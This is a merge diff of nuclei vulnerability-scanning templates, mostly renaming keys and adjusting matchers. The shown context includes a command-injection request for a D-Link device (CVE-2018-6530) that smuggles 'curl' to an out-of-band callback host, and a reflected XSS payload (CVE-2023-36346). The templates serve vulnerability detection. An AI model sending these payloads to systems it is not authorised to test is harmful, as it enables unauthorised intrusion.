Merge pull request #7646 from projectdiscovery/princechaddha-patch-2

Release Prep

http/cves/2018/CVE-2018-6530.yaml

@@ -19,7 +19,7 @@ info:
     max-request: 1
   tags: cve,cve2018,d-link,rce,oast,unauth
 
-requests:
+http:
   - raw:
       - |
         POST /soap.cgi?service=whatever-control;curl {{interactsh-url}};whatever-invalid-shell HTTP/1.1

http/cves/2023/CVE-2023-36346.yaml

@@ -20,7 +20,7 @@ info:
     verified: "true"
   tags: cve,cve2023,xss,pos,codekop,unauth
 
-requests:
+http:
   - method: GET
     path:
       - "{{BaseURL}}/print.php?nm_member=<script>alert(document.location)</script>"
@@ -31,6 +31,7 @@ requests:
         part: body
         words:
           - "<script>alert(document.location)</script>"
+          - "<title>print</title>"
         condition: and
 
       - type: word

http/exposed-panels/dell-idrac.yaml

@@ -21,6 +21,7 @@ http:
       - '{{BaseURL}}/login.html'
 
     stop-at-first-match: true
+    matchers-condition: and
     matchers:
       - type: word
         part: body

http/misconfiguration/proxy/open-proxy-external.yaml

@@ -27,10 +27,19 @@ http:
         GET http://{{interactsh-url}} HTTP/1.1
         Host: {{interactsh-url}}
 
+      - |+
+        GET / HTTP/1.1
+        Host: {{Hostname}}
+
     unsafe: true
+    matchers-condition: and
     matchers:
       - type: dsl
         dsl:
           - contains(body_1, "www.iana.org") || contains(body_1, "<title>Example Domain</title>")
           - contains(header_2, "X-Interactsh-Version")
         condition: or
+
+      - type: dsl
+        dsl:
+          - '!contains(body_3, "<title>Example Domain</title>")'